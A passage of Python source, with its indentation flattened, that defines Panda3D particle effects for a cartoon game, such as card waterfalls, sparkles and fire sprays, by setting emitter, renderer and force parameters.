# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
p0.renderer.setColor(Vec4(1.00, 0.00, 0.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.05)
p0.renderer.setFinalXScale(0.05)
p0.renderer.setInitialYScale(0.05)
p0.renderer.setFinalYScale(0.05)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(4.000*1.2)
p0.emitter.setAmplitudeSpread(1.000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -4.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.300)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 1.2000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED,1.0000, 20, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearJitterForce(5.0000, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def restrainingOrderCloud(self):
self.reset()
self.setPos(0.000, 4.000, 3.000)
self.setHpr(-180.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
#p0.setRenderer("PointParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(60)
p0.setBirthRate(0.0001)
p0.setLitterSize(60)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.2000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.02)
p0.renderer.setFinalXScale(0.001)
p0.renderer.setInitialYScale(0.02)
p0.renderer.setFinalYScale(0.001)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(3.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 6.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -18.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.8900)
self.addParticles(p0)
@particle
def numberSpill(self):
self.reset()
self.setPos(0.900, 2.100, 1.90)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.100, 1.100, 1.100)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(6)
p0.setBirthRate(0.3000)
p0.setLitterSize(2)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(5.8000)
p0.factory.setLifespanSpread(0.4000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
p0.renderer.setColor(Vec4(0, 0, 0, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.2)
p0.renderer.setFinalXScale(0.03)
p0.renderer.setInitialYScale(0.3)
p0.renderer.setFinalYScale(0.05)
p0.renderer.setNonanimatedTheta(90.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(2.0000)
p0.emitter.setAmplitudeSpread(1.300)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.3282)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -33.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def headShrinkDrop(self):
self.reset()
self.setPos(0.000, 0.000, 7.500)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(2.000, 2.000, 2.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(60)
p0.setBirthRate(0.1500)
p0.setLitterSize(3)
p0.setLitterSpread(2)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.2000)
p0.factory.setLifespanSpread(0.2000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1, 0.84, 0, 1.00))
p0.renderer.setEdgeColor(Vec4(1, 1, 1, 0.3))
p0.renderer.setBirthRadius(0.0400)
p0.renderer.setDeathRadius(0.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(2.300)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 4.0000))
# Disc parameters
p0.emitter.setRadius(0.2800)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(0.060, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def rollodexWaterfall(self):
self.reset()
self.setPos(-0.160, 2.942, 3.400)
self.setHpr(89.908, -20.000, 179.476)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereSurfaceEmitter")
p0.setPoolSize(20)
p0.setBirthRate(0.2000)
p0.setLitterSize(3)
p0.setLitterSpread(2)
p0.setSystemLifespan(5.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/rollodex-card")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.4)
p0.renderer.setFinalXScale(0.4)
p0.renderer.setInitialYScale(0.3)
p0.renderer.setFinalYScale(0.3)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Surface parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forward')
# Force parameters
force0 = LinearSourceForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.0000, 1)
force0.setActive(0)
f0.addForce(force0)
force1 = LinearSinkForce(Point3(0.0000, 0.0000, 10.0000), LinearDistanceForce.FTONEOVERRCUBED, 2.9550, 50.0000, 1)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def rollodexStream(self):
self.reset()
self.setPos(0.107, 2.799, 3.400)
self.setHpr(89.908, -20.000, 179.476)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("PointEmitter")
p0.setPoolSize(60)
p0.setBirthRate(0.2000)
p0.setLitterSize(2)
p0.setLitterSpread(1)
p0.setSystemLifespan(5.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(3.0000)
p0.factory.setMassSpread(2.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/rollodex-card")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.4)
p0.renderer.setFinalXScale(0.4)
p0.renderer.setInitialYScale(0.3)
p0.renderer.setFinalYScale(0.3)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
p0.emitter.setAmplitude(-15.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Point parameters
p0.emitter.setLocation(Point3(0.0000, 0.0000, 0.0000))
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forward')
# Force parameters
force0 = LinearSourceForce(Point3(0.0000, 0.0000, 0.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 1.0000, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearJitterForce(19.1346, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def shiftSpray(self):
self.reset()
self.setPos(0.000, 5.000, 2.300)
self.setHpr(0.000, -55.000, 0.000)
self.setScale(9.000, 9.000, 9.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("LineEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.100)
p0.setLitterSize(7)
p0.setLitterSpread(2)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.3000)
p0.factory.setLifespanSpread(0.1000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1.00, 1.00, 0.00, 0.9))
p0.renderer.setEdgeColor(Vec4(1.00, 1.00, 0.00, 0.6))
p0.renderer.setBirthRadius(0.0200)
p0.renderer.setDeathRadius(0.0600)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(3.5000)
p0.emitter.setAmplitudeSpread(0.5000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, 96.0000), LinearDistanceForce.FTONEOVERRSQUARED, 3.0400, 1.5000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def pixieDrop(self):
self.reset()
self.setPos(0.000, 0.000, 6.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(2.000, 2.000, 2.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(150)
p0.setBirthRate(0.1000)
p0.setLitterSize(7)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(2.2000)
p0.factory.setLifespanSpread(0.2000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
p0.renderer.setBirthRadius(0.0400)
p0.renderer.setDeathRadius(0.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 4.0000))
# Disc parameters
p0.emitter.setRadius(0.3000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(3.6003, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def hotAirSpray(self):
self.reset()
self.setPos(0.000, 2.500, 3.200) # originally (0,4,4)
self.setHpr(-180.000, 80.000, -180.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(10)
p0.setBirthRate(0.2000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.6000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/fire")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.6)
p0.renderer.setFinalXScale(0.3)
p0.renderer.setInitialYScale(0.6)
p0.renderer.setFinalYScale(0.3)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(2.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 5.1000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.0200)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -4.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, -10.0000, 0.0000), 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def resistanceEffectSparkle(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(500)
p0.setBirthRate(0.1000)
p0.setLitterSize(500)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(3.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setEdgeColor(Vec4(0.00, 0.00, 1.00, 1.00))
p0.renderer.setBirthRadius(0.2000)
p0.renderer.setDeathRadius(0.1000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(20.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(2.0000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def tt_p_efx_rocketLaunchFire(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("LineEmitter")
p0.setPoolSize(50)
p0.setBirthRate(0.0100)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(1.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.5000)
p0.factory.setLifespanSpread(0.1000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(0.69)
# Sprite parameters
# p0.renderer.addTextureFromFile('../../ttmodels/src/maps/tt_t_efx_fireball.tif')
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(2.0000)
p0.renderer.setFinalXScale(4.0000)
p0.renderer.setInitialYScale(1.0000)
p0.renderer.setFinalYScale(4.0000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
p0.renderer.getColorInterpolationManager().addLinear(0.10999999940395355,1.0,Vec4(1.0,1.0,1.0,1.0),Vec4(0.729411780834198,0.40392157435417175,0.11372549086809158,1.0),1)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, -10.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Line parameters
p0.emitter.setEndpoint1(Point3(1.0000, 0.0000, 0.0000))
p0.emitter.setEndpoint2(Point3(0.0000, 0.0000, 0.0000))
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('Gravity')
# Force parameters
force0 = LinearVectorForce(Vec3(0.0000, 0.0000, 2.5000), 1.0000, 0)
force0.setVectorMasks(1, 1, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, 0.0000, -3.0000), 5.0000, 0)
force1.setVectorMasks(1, 1, 1)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def icetnt(self):
self.reset()
self.setPos(0.000, 0.000, -0.000)
self.setHpr(0.000, 10.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(40)
p0.setBirthRate(0.1000)
p0.setLitterSize(2)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.2000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/spark")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.3)
p0.renderer.setFinalXScale(0.3)
p0.renderer.setInitialYScale(0.3)
p0.renderer.setFinalYScale(0.03)
p0.renderer.setNonanimatedTheta(20.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Sparkle parameters
#p0.renderer.setCenterColor(Vec4(0.78, 0.78, 0, 1.00))
#p0.renderer.setEdgeColor(Vec4(0.78, 0.78, 0, 1.00))
#p0.renderer.setBirthRadius(0.0600)
#p0.renderer.setDeathRadius(0.0600)
#p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.5000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.2282)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -19.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def resistanceEffectSprite(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(50)
p0.setBirthRate(0.1000)
p0.setLitterSize(50)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(3.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.5000)
p0.renderer.setFinalXScale(0.5000)
p0.renderer.setInitialYScale(0.5000)
p0.renderer.setFinalYScale(0.5000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(20.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 20.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(2.0000)
self.addParticles(p0)
p1 = Particles.Particles('particles-2')
# Particles parameters
p1.setFactory("PointParticleFactory")
p1.setRenderer("SpriteParticleRenderer")
p1.setEmitter("SphereVolumeEmitter")
p1.setPoolSize(50)
p1.setBirthRate(0.1000)
p1.setLitterSize(50)
p1.setLitterSpread(0)
p1.setSystemLifespan(0.0000)
p1.setLocalVelocityFlag(1)
p1.setSystemGrowsOlderFlag(0)
# Factory parameters
